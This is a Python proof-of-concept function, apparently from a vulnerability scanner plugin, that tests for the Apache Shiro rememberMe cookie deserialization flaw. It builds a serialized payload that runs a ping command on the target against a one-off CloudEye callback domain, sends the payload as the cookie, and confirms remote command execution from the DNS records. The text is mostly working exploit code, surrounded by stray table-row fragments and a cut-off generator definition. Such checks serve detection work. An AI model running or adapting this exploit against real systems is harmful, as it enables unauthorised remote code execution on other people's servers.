(url)
| 23 | |
| 24 | |
def poc(url):
    """Check `url` for command execution through the ``rememberMe`` cookie.

    A serialized payload built by ``generator`` is sent as the ``rememberMe``
    cookie. The payload's command pings a one-off domain obtained from
    ``CloudEye`` (requested with the 'shiro' tag), and the check is confirmed
    out of band by looking for that domain in the DNS records CloudEye returns.

    Args:
        url: Target as a full URL or a bare ``host[:port]``. Without a scheme,
            ``https://`` is used when the string contains ':443', otherwise
            ``http://``.

    Returns:
        ``url`` followed by ' - <ip>' for each client address found in the DNS
        record when the callback domain was seen, otherwise ``False``.

    Note:
        ``False`` is also returned when any exception is raised (connection
        error, timeout, payload generation failure), so it does not establish
        that the target is unaffected.
        On the target side the probe shows up as a GET carrying a
        ``rememberMe`` cookie, followed by a lookup of the generated domain.
    """
    # Normalise the target: keep an explicit scheme, otherwise guess from the port.
    if '://' in url:
        endpoint = url
    elif ':443' in url:
        endpoint = 'https://%s' % url
    else:
        endpoint = 'http://%s' % url

    try:
        monitor = CloudEye()
        # Unique domain used as the out-of-band marker for this probe.
        marker = monitor.getRandomDomain('shiro')
        # Command the payload runs on the target; both the Windows (-n) and
        # Unix (-c) ping forms are tried so either platform triggers a lookup.
        probe_cmd = 'ping -n 3 %s || ping -c 3 %s' % (marker, marker)
        cookie_value = generator(probe_cmd, JAR_FILE).decode()
        # Deliver the verification request.
        requests.get(endpoint, cookies={'rememberMe': cookie_value}, timeout=10)

        records = monitor.getDnsRecord(delay=2)
        if marker not in records:
            return False
        # Each 'client <ip>#' entry in the record is the target's egress address.
        egress = re.findall(r'client (.*)#', records)
        return ' - '.join([url] + egress)
    except Exception:
        # Best-effort check: every failure is reported as a negative result.
        return False
| 47 | |
| 48 | |
| 49 | def generator(command, fp): |